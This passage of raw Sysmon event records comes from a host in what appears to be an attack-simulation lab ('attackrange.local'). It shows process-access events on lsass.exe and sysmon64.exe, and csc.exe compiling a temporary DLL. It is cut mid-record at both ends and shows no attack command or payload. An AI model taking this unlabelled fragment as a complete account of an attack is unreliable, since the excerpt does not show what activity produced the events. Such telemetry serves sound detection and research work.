Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004568Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.597{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004567Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.597{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004566Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:42.566{10ACEC4A-85A2-5FCF-E500-000000009101}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\xlebw0a0.dll2020-12-08 13:54:42.456 10341000x80000000000000004565Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A2-5FCF-E600-000000009101}3864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004564Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004563Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004562Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004561Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004560Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004559Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004558Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004557Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004556Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004555Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.550{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A2-5FCF-E600-000000009101}3864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004554Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.550{10ACEC4A-85A2-5FCF-E500-000000009101}50764456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-85A2-5FCF-E600-000000009101}3864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004553Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.565{10ACEC4A-85A2-5FCF-E600-000000009101}3864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES9B8F.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC75B761AE1942407C8011045D640531E.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-85A2-5FCF-E500-000000009101}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\xlebw0a0.cmdline" 10341000x80000000000000004552Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A2-5FCF-E500-000000009101}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004551Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004550Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004549Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004548Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004547Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004546Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004545Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004544Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004543Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 